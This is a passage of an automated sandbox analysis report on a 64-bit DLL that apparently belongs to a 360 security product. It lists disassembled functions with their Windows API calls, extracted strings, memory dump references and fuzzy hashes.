??_V@YAXPEAX@Z.MSVCRT ref: 00000001800041F9
??_V@YAXPEAX@Z.MSVCRT ref: 000000018000420B
SetLastError.KERNEL32 ref: 0000000180004217

Strings

MsiDecomposeDescriptorW, xrefs: 0000000180003FE1
\msi.dll, xrefs: 0000000180003F4A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$Read$memset$Pointer$ErrorFreeHandleLastTask$AllocCloseCreateInformationLibrary
String ID: MsiDecomposeDescriptorW$\msi.dll
API String ID: 4003554184-1492151253
Opcode ID: ec115adb619cef7b177d1379de1e02f1d42195d7e60c4210a290fc10aee9579f
Instruction ID: 6edc26f3f0b57b9798bafb549a2288c124352e2b3efb4315e33b70b2a8a600e5
Opcode Fuzzy Hash: ec115adb619cef7b177d1379de1e02f1d42195d7e60c4210a290fc10aee9579f
Instruction Fuzzy Hash: 93928F7270465886EBA6DF26D8443ED33A5F749BE4F448226FA694BBD4DF38C648C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004A650 Relevance: 79.3, APIs: 37, Strings: 8, Instructions: 513
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 000000018004A762
GetModuleFileNameW.KERNEL32 ref: 000000018004A778
PathAppendW.SHLWAPI ref: 000000018004A79A
ShellExecuteExW.SHELL32 ref: 000000018004A7D9
ILGetSize.SHELL32 ref: 000000018004A879
GetTickCount.KERNEL32 ref: 000000018004A8A3
srand.MSVCRT ref: 000000018004A8AB
GetCurrentProcess.KERNEL32 ref: 000000018004A8C4
GetProcessId.KERNEL32 ref: 000000018004A8CD
GetCurrentThreadId.KERNEL32 ref: 000000018004A8FF
rand.MSVCRT ref: 000000018004A907
LocalAlloc.KERNEL32 ref: 000000018004A956
InitializeSecurityDescriptor.ADVAPI32 ref: 000000018004A96C
LocalFree.KERNEL32 ref: 000000018004A979
SetSecurityDescriptorDacl.ADVAPI32 ref: 000000018004A9D6
CreateFileMappingW.KERNEL32 ref: 000000018004AA10
LocalFree.KERNEL32 ref: 000000018004AA1E
CreateFileMappingW.KERNEL32 ref: 000000018004AA59
MapViewOfFile.KERNEL32 ref: 000000018004AA84
CloseHandle.KERNEL32 ref: 000000018004AA97
memset.MSVCRT ref: 000000018004AAAC
memmove.MSVCRT ref: 000000018004AB4C
memmove.MSVCRT ref: 000000018004AB67
memmove.MSVCRT ref: 000000018004ABB3
memmove.MSVCRT ref: 000000018004ABCC
memmove.MSVCRT ref: 000000018004AC8F
UnmapViewOfFile.KERNEL32 ref: 000000018004ACA8
FindWindowW.USER32 ref: 000000018004ACC1
SetForegroundWindow.USER32 ref: 000000018004ACCF
memset.MSVCRT ref: 000000018004ACE4
wsprintfW.USER32 ref: 000000018004AD17
memset.MSVCRT ref: 000000018004AD2E
WaitForSingleObject.KERNEL32 ref: 000000018004AE1F
Sleep.KERNEL32 ref: 000000018004AE34
CloseHandle.KERNEL32 ref: 000000018004AE4C
CloseHandle.KERNEL32 ref: 000000018004AE5B
CloseHandle.KERNEL32 ref: 000000018004AE66

Strings

..\360DeskAna64.exe, xrefs: 000000018004A78C
Progman, xrefs: 000000018004ACBA
%u_%d_%d_%d_%u, xrefs: 000000018004A92D
open, xrefs: 000000018004A654
Program manager, xrefs: 000000018004ACB3
se1, xrefs: 000000018004AD10
se2, xrefs: 000000018004AD07
/%s %s %u, xrefs: 000000018004ACF1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
API String ID: 1121195023-828389715
Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800655A8 Relevance: 68.6, APIs: 28, Strings: 11, Instructions: 339
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180065624
LeaveCriticalSection.KERNEL32 ref: 0000000180065AAD

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 0000000180065682
GetModuleFileNameW.KERNEL32 ref: 0000000180065696
PathAppendW.SHLWAPI ref: 00000001800656A8
StrStrIW.SHLWAPI ref: 00000001800656BA
PathFileExistsW.SHLWAPI ref: 00000001800656E9
PathAppendW.SHLWAPI ref: 0000000180065718

Part of subcall function 000000018000A354: Sleep.KERNEL32 ref: 000000018000A395
Part of subcall function 000000018000A354: Sleep.KERNEL32 ref: 000000018000A3E8

PathFileExistsW.SHLWAPI ref: 0000000180065733
memset.MSVCRT ref: 000000018006577B
SHGetValueW.SHLWAPI ref: 00000001800657AE
PathAppendW.SHLWAPI ref: 00000001800657C8
PathFileExistsW.SHLWAPI ref: 00000001800657E7
LoadLibraryW.KERNEL32 ref: 000000018006584B
GetProcAddress.KERNEL32 ref: 0000000180065865
GetProcAddress.KERNEL32 ref: 000000018006587A
GetModuleFileNameW.KERNEL32 ref: 00000001800658AA
PathAppendW.SHLWAPI ref: 00000001800658BC
PathFileExistsW.SHLWAPI ref: 00000001800658DC
PathAppendW.SHLWAPI ref: 0000000180065907
PathFileExistsW.SHLWAPI ref: 0000000180065922
memset.MSVCRT ref: 000000018006596B
SHGetValueW.SHLWAPI ref: 000000018006599E
PathAppendW.SHLWAPI ref: 00000001800659B8
PathFileExistsW.SHLWAPI ref: 00000001800659D7
LoadLibraryW.KERNEL32 ref: 0000000180065A3B
GetProcAddress.KERNEL32 ref: 0000000180065A55
GetProcAddress.KERNEL32 ref: 0000000180065A6A

Strings

CreateObject, xrefs: 000000018006585E, 0000000180065A4E
360conf64.dll, xrefs: 00000001800659AC, 0000000180065A1E
path, xrefs: 0000000180065799, 0000000180065989
..\..\360base64.dll, xrefs: 0000000180065711
..\360base64.dll, xrefs: 000000018006569C
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00000001800657A0, 0000000180065990
..\..\360conf64.dll, xrefs: 0000000180065900
InitLibs, xrefs: 000000018006586F, 0000000180065A5F
\deepscan\360base64.dll, xrefs: 00000001800656AE
..\360conf64.dll, xrefs: 00000001800658B0
360base64.dll, xrefs: 00000001800657BC, 000000018006582E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Path$File$AppendExists$AddressProc$memset$CriticalLibraryLoadModuleNameSectionSleepValue$EnterHeapLeaveProcess
String ID: ..\..\360base64.dll$..\..\360conf64.dll$..\360base64.dll$..\360conf64.dll$360base64.dll$360conf64.dll$CreateObject$InitLibs$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$\deepscan\360base64.dll$path
API String ID: 915540683-2864068223
Opcode ID: bdcb2047be7a0d43f9a5865a595f44413cc4095ddd18bc437aaa25b8a2dbd945
Instruction ID: d884d170d7a5308d36e8fcb93366518d72040e1886450bd247f02bd6a7684e11
Opcode Fuzzy Hash: bdcb2047be7a0d43f9a5865a595f44413cc4095ddd18bc437aaa25b8a2dbd945
Instruction Fuzzy Hash: 8EF17035214B4C92EA92DF25E8403DA73A2F78CBD5F549215FAAA436A4EF38C74DC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010580 Relevance: 61.5, APIs: 25, Strings: 10, Instructions: 237
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00000001800105C6
GetModuleFileNameW.KERNEL32 ref: 00000001800105DD
memset.MSVCRT ref: 00000001800105EF
RegOpenKeyExW.ADVAPI32 ref: 000000018001061C
RegQueryValueExW.ADVAPI32 ref: 0000000180010660
RegCloseKey.ADVAPI32 ref: 000000018001066B
PathAddBackslashW.SHLWAPI ref: 0000000180010684
StrCmpNIW.SHLWAPI ref: 00000001800106C8
memset.MSVCRT ref: 00000001800106E0
PathFileExistsW.SHLWAPI ref: 000000018001071C
memset.MSVCRT ref: 0000000180010734
PathFileExistsW.SHLWAPI ref: 0000000180010769
memset.MSVCRT ref: 000000018001077B
PathFileExistsW.SHLWAPI ref: 00000001800107AC

Strings

safemon\pedrver.dll, xrefs: 0000000180010739
360SkinMgr.exe, xrefs: 0000000180010916
%s\%s, xrefs: 00000001800106EF
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe, xrefs: 0000000180010896
safemon\FreeSaaS.tpi, xrefs: 0000000180010780
safemon\360Cactus.tpi, xrefs: 0000000180010834
Path, xrefs: 0000000180010655, 00000001800108D7
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 000000018001060B
hipsver.dll, xrefs: 00000001800107E7
360leakfixer.exe, xrefs: 00000001800106E5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
API String ID: 4260417939-4002867936
Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007C140 Relevance: 61.4, APIs: 32, Strings: 2, Instructions: 1880COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018007C364
memmove.MSVCRT ref: 000000018007C38F
memmove.MSVCRT ref: 000000018007C430
memset.MSVCRT ref: 000000018007C43F
_errno.MSVCRT ref: 000000018007C444
memmove.MSVCRT ref: 000000018007C669
memset.MSVCRT ref: 000000018007C678
_errno.MSVCRT ref: 000000018007C67D
memset.MSVCRT ref: 000000018007C804
memmove.MSVCRT ref: 000000018007C82F
memmove.MSVCRT ref: 000000018007C8D0
memset.MSVCRT ref: 000000018007C8DF
_errno.MSVCRT ref: 000000018007C8E4
memmove.MSVCRT ref: 000000018007CB53
memset.MSVCRT ref: 000000018007CB62
_errno.MSVCRT ref: 000000018007CB67
memset.MSVCRT ref: 000000018007CE69
memmove.MSVCRT ref: 000000018007CE94
memmove.MSVCRT ref: 000000018007CF4E
memmove.MSVCRT ref: 000000018007D1D2
memset.MSVCRT ref: 000000018007D1E1
_errno.MSVCRT ref: 000000018007D1E6

Strings

s, xrefs: 000000018007C770
s, xrefs: 000000018007C2AF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$memset$_errno
String ID: s$s
API String ID: 1013060226-2433928763
Opcode ID: 80b0ab6508d627de71779979219e21ca881affaedfde3055972eae66f5e13f87
Instruction ID: 1d7952d8602a8676256beffd8a10231c25a82f7a790c47b417b2fdc91bffeec8
Opcode Fuzzy Hash: 80b0ab6508d627de71779979219e21ca881affaedfde3055972eae66f5e13f87
Instruction Fuzzy Hash: E603C2727106898BE7B6CF29D444BE977A1F38C7C8F509119EA4657B84DF3ADA09CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AFE8 Relevance: 53.2, APIs: 29, Strings: 1, Instructions: 700COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018003B1EC

Part of subcall function 00000001800102D0: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180010313

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 000000018003B0A7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@??3@
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
API String ID: 1936579350-1713319389
Opcode ID: de07e1bc86237a5aca6dd0dfd658aa05e3ed97bf1d4081ac9606dc9f4cbeac81
Instruction ID: 78c147e4d1709cfe56d0b7305879f473f1c9ccde168616adeb7b08352c337043
Opcode Fuzzy Hash: de07e1bc86237a5aca6dd0dfd658aa05e3ed97bf1d4081ac9606dc9f4cbeac81
Instruction Fuzzy Hash: 8752EF32709B8889FB46CF65D5143EE27A1A3087D8F458621EB6E57BDADF79C249C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180076930 Relevance: 46.7, APIs: 22, Strings: 4, Instructions: 1188COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 0000000180076977
memset.MSVCRT ref: 0000000180077030
memmove.MSVCRT ref: 000000018007705A
memmove.MSVCRT ref: 000000018007710B
memset.MSVCRT ref: 000000018007711A
_errno.MSVCRT ref: 000000018007711F
memmove.MSVCRT ref: 00000001800773E4
memset.MSVCRT ref: 00000001800773F3
_errno.MSVCRT ref: 00000001800773F8
memset.MSVCRT ref: 0000000180077540
memmove.MSVCRT ref: 000000018007756A
memmove.MSVCRT ref: 000000018007760C
memset.MSVCRT ref: 000000018007761B
_errno.MSVCRT ref: 0000000180077620
memmove.MSVCRT ref: 00000001800778F0
memset.MSVCRT ref: 00000001800778FF
_errno.MSVCRT ref: 0000000180077904

Strings

1#IND, xrefs: 0000000180076A4D
1#QNAN, xrefs: 0000000180076A5F
1#INF, xrefs: 0000000180076A68
1#SNAN, xrefs: 0000000180076A56

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmovememset$_errno$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 2591457777-2761157908
Opcode ID: 88a9ba00e6e068890ed251e76263c28351ad1ff40a0f5855f604ac2084e58437
Instruction ID: f7af16447f6c096e4f5e386a29f6c1111b180ab9681df128fea2e8910a76382c
Opcode Fuzzy Hash: 88a9ba00e6e068890ed251e76263c28351ad1ff40a0f5855f604ac2084e58437
Instruction Fuzzy Hash: E8B2D672B011898AE7BA8F69D4447ED37A1F38C7C8F549115EA0A57B95DF3ACB08CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008E20 Relevance: 46.2, APIs: 20, Strings: 6, Instructions: 684registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81

lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EAC
lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EC6
CharNextW.USER32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F12
lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F3D
lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008FCA
lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008FF8
RegDeleteValueW.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800090D2
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800090ED
CharNextW.USER32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009118
RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800091D4
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800091F0
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009224
RegQueryInfoKeyW.ADVAPI32 ref: 0000000180009403
lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009423
RegQueryInfoKeyW.ADVAPI32 ref: 00000001800094A2
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800094C2
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800095D6
lstrcmpiW.KERNEL32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800096CA
CoTaskMemFree.OLE32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800097AC

Strings

Val, xrefs: 0000000180008FEE
RegOpenKeyTransactedW, xrefs: 0000000180008F4B, 0000000180009437
REGISTRY, xrefs: 0000000180009636
NoRemove, xrefs: 0000000180008FC0
Delete, xrefs: 0000000180008EA2
ForceRemove, xrefs: 0000000180008EBC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: lstrcmpi$CharCloseNext$InfoQuery$CreateDeleteFreeTaskValue
String ID: Delete$ForceRemove$NoRemove$REGISTRY$RegOpenKeyTransactedW$Val
API String ID: 2745146946-1115601298
Opcode ID: 627c433637acc8be8bbfdb9156955dc5479dfa6dbb1ed28c30b45dc979df0d23
Instruction ID: ae6ecb7a7167c02cf6bf2ecb480314a04e234ded6d812639cd3a31308d1e7f2c
Opcode Fuzzy Hash: 627c433637acc8be8bbfdb9156955dc5479dfa6dbb1ed28c30b45dc979df0d23
Instruction Fuzzy Hash: FF42C672B05B4586FB96CBA698403DE72E1BB8C7C4F54C125BE4987B98EF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001ECF4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 323
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 000000018001ED67
GetFileSizeEx.KERNEL32 ref: 000000018001ED80
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001EDA6
ReadFile.KERNEL32 ref: 000000018001EDCE
CloseHandle.KERNEL32 ref: 000000018001EDDD
SetFilePointer.KERNEL32 ref: 000000018001EE03
ReadFile.KERNEL32 ref: 000000018001EE20
SetFilePointer.KERNEL32 ref: 000000018001EE63
ReadFile.KERNEL32 ref: 000000018001EE80
SetFilePointer.KERNEL32 ref: 000000018001EF14
ReadFile.KERNEL32 ref: 000000018001EF31
SetFilePointer.KERNEL32 ref: 000000018001EFB0
ReadFile.KERNEL32 ref: 000000018001EFCD
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001F007
MultiByteToWideChar.KERNEL32 ref: 000000018001F034

Part of subcall function 0000000180036EC8: wcschr.MSVCRT ref: 0000000180036F7A
Part of subcall function 0000000180036EC8: _wcslwr.MSVCRT ref: 0000000180036FC8

SetFilePointer.KERNEL32 ref: 000000018001F064
ReadFile.KERNEL32 ref: 000000018001F07D
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001F0A6
memmove.MSVCRT ref: 000000018001F0C1
memmove.MSVCRT ref: 000000018001F0EE
memmove.MSVCRT ref: 000000018001F117
??3@YAXPEAX@Z.MSVCRT ref: 000000018001F172
CloseHandle.KERNEL32 ref: 000000018001F17E
??3@YAXPEAX@Z.MSVCRT ref: 000000018001F195
CloseHandle.KERNEL32 ref: 000000018001F1A5

Strings

9, xrefs: 000000018001EF82

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
String ID: 9
API String ID: 2469906296-2366072709
Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062148 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006217C
GetModuleFileNameW.KERNEL32 ref: 0000000180062193
PathCombineW.SHLWAPI ref: 00000001800621AA

Part of subcall function 0000000180065F9C: GetModuleHandleW.KERNEL32 ref: 0000000180065FBE
Part of subcall function 0000000180065F9C: memset.MSVCRT ref: 0000000180065FD4

GetProcAddress.KERNEL32 ref: 00000001800621DB
GetProcAddress.KERNEL32 ref: 00000001800621EF
GetProcAddress.KERNEL32 ref: 0000000180062203
GetProcAddress.KERNEL32 ref: 0000000180062217
GetProcAddress.KERNEL32 ref: 000000018006222B
GetProcAddress.KERNEL32 ref: 000000018006223F
GetProcAddress.KERNEL32 ref: 0000000180062253
GetProcAddress.KERNEL32 ref: 0000000180062267
GetProcAddress.KERNEL32 ref: 000000018006227B
GetProcAddress.KERNEL32 ref: 000000018006228F
FreeLibrary.KERNEL32 ref: 00000001800622DD

Strings

GetModuleBaseNameW64, xrefs: 00000001800621E1
EnumProcessModules64, xrefs: 0000000180062209
GetModuleFileNameExW64, xrefs: 00000001800621F5
GetModuleInformation64, xrefs: 0000000180062259
NtQueryInformationProcess64, xrefs: 0000000180062281
IsProcessWow64Process, xrefs: 0000000180062245
..\ipc\x64for32lib.dll, xrefs: 0000000180062199
GetCurrentDirectory64, xrefs: 0000000180062231
NtQueryInformationThread64, xrefs: 000000018006226D
GetCommandLine64, xrefs: 000000018006221D
ReadProcessMemory64, xrefs: 00000001800621D1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
